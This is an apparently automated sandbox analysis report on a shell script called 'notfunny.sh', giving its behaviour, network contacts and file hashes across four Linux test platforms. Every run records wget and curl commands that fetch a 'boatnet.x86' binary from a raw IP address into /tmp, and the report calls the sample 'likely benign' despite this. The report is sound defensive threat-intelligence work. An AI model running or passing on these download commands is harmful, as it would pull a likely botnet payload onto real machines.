Malware Analysis Report

2025-04-03 19:34

Sample ID 241028-bnyepsxamh
Target notfunny.sh
SHA256 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b
Tags
upx antivm discovery
score
5/10

Table of Contents

Analysis Overview
  MITRE ATT&CK
    Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral3
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral4
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

score
5/10

SHA256

9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b

Threat Level: Likely benign

The file notfunny.sh was found to be: Likely benign.

Malicious Activity Summary

upx antivm discovery

UPX packed file

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-28 01:18

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-28 01:18

Reported

2024-10-28 01:20

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

149s

Max time network

128s

Command Line

[/tmp/notfunny.sh]

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/boatnet.x86 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.x86 /usr/bin/wget N/A

Processes

/tmp/notfunny.sh

[/tmp/notfunny.sh]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86]

Network

Country  Destination             Domain           Proto
US       154.216.19.166:3000     154.216.19.166   tcp
N/A      224.0.0.251:5353        N/A              udp
US       151.101.193.91:443      N/A              tcp
GB       195.181.164.14:443      N/A              tcp
GB       185.125.188.62:443      N/A              tcp
GB       185.125.188.62:443      N/A              tcp
US       154.216.19.166:3000     154.216.19.166   tcp

Files

/tmp/boatnet.x86

MD5 8833728bd41c20fb14e6075a9cdd8afc
SHA1 9733c8e51ed6c6a349cfadaf9bfc58aa5222feaa
SHA256 ff2f19e0d279d3c53e6c154790dbaaeccb8d5664399d68ba4c44bdd3405c8671
SHA512 58fe870f0f8b470c70a843e44f603478ac368406a947a1fb46230577179357c633168dd63071ca6ca0365d553972decddc13264ac35fa2d4632c82b4d414ce48

/tmp/boatnet.x86

MD5 fae60c4eac7b4998f780c9e78baea871
SHA1 1e398be7855c3971eae39a1b860324b34483876c
SHA256 26044e5d1c95ad4518fce56f55f3b8163eeae768ec1ffc06ff0e26563a94c1e6
SHA512 cd51a9e0ecf5e306db58eac8ee5261f67bb3331aa78d2d2abea88bf0da23c28ef9e86fa843c3fe123b8545ea7934dc66f1c70436cd7f1147977382d2ee5afad5

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-28 01:18

Reported

2024-10-28 01:20

Platform

debian9-armhf-20240611-en

Max time kernel

149s

Max time network

127s

Command Line

[/tmp/notfunny.sh]

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/boatnet.x86 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.x86 /usr/bin/curl N/A

Processes

/tmp/notfunny.sh

[/tmp/notfunny.sh]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86]

Network

Country Destination Domain Proto
US 154.216.19.166:3000 154.216.19.166 tcp
US 154.216.19.166:3000 154.216.19.166 tcp

Files

/tmp/boatnet.x86

MD5 8833728bd41c20fb14e6075a9cdd8afc
SHA1 9733c8e51ed6c6a349cfadaf9bfc58aa5222feaa
SHA256 ff2f19e0d279d3c53e6c154790dbaaeccb8d5664399d68ba4c44bdd3405c8671
SHA512 58fe870f0f8b470c70a843e44f603478ac368406a947a1fb46230577179357c633168dd63071ca6ca0365d553972decddc13264ac35fa2d4632c82b4d414ce48

/tmp/boatnet.x86

MD5 12776fc203b937b6422e57bbbbcbf012
SHA1 d656e47cc7c9df12f563f9e10c35594dadb3e682
SHA256 a037afc2c98a4db8eecd784faacbfdc713c42ae1e8a6c804a6cc2ed7244b3623
SHA512 93a943182e6da55369f6a2fbeca918469eb726609584ca128d845d0d772efb34ed53069df7715bac1250f2dfa1cfdeb6f246edfcec7825414ca9d61d86e8ae34

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-28 01:18

Reported

2024-10-28 01:20

Platform

debian9-mipsbe-20240611-en

Max time kernel

149s

Max time network

28s

Command Line

[/tmp/notfunny.sh]

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/boatnet.x86 /usr/bin/wget N/A

Processes

/tmp/notfunny.sh

[/tmp/notfunny.sh]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86]

Network

Country Destination Domain Proto
US 154.216.19.166:3000 154.216.19.166 tcp

Files

/tmp/boatnet.x86

MD5 54e076b42cc4c7bc77ed783c93733706
SHA1 60142c48cd534ab3069378d73a63c87627efb42b
SHA256 fbc7b2a7d16b78fc5360b2709692ae863466577e3fd0de5e4245cc2432d33a13
SHA512 cabea678a945078356c35a68a2cab192bbb6ceb1c47ca05e9f3b519be4832bdd8ab6d78226617cf5de4b4f19097dcb9ebf142c7259234bd2c6f6118c7adaaa2a

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-28 01:18

Reported

2024-10-28 01:20

Platform

debian9-mipsel-20240611-en

Max time kernel

149s

Max time network

122s

Command Line

[/tmp/notfunny.sh]

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/boatnet.x86 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.x86 /usr/bin/curl N/A

Processes

/tmp/notfunny.sh

[/tmp/notfunny.sh]

/usr/bin/wget

[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86]

/usr/bin/curl

[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86]

Network

Country Destination Domain Proto
US 154.216.19.166:3000 154.216.19.166 tcp
US 154.216.19.166:3000 154.216.19.166 tcp

Files

/tmp/boatnet.x86

MD5 8833728bd41c20fb14e6075a9cdd8afc
SHA1 9733c8e51ed6c6a349cfadaf9bfc58aa5222feaa
SHA256 ff2f19e0d279d3c53e6c154790dbaaeccb8d5664399d68ba4c44bdd3405c8671
SHA512 58fe870f0f8b470c70a843e44f603478ac368406a947a1fb46230577179357c633168dd63071ca6ca0365d553972decddc13264ac35fa2d4632c82b4d414ce48